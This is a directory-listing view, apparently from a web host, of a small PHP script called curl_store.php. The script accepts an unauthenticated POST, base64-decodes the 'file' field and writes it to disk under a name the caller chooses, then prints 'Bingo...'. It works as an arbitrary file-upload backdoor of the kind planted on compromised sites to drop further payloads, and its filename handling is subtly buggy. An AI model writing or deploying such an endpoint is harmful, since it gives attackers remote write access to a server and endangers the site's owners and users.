File "curl_store.php"

Full Path: /home/analogde/www/Documents/CURL/curl_store.php
File size: 194 bytes
MIME-type: text/x-php
Charset: utf-8

<?php
if(isset($_POST['file']))
{
$encoded_file = $_POST['file'];
$file = base64_decode($encoded_file);
$title = $_POST['file']['name'];
file_put_contents($title, $file);

echo "Bingo...";

}
?>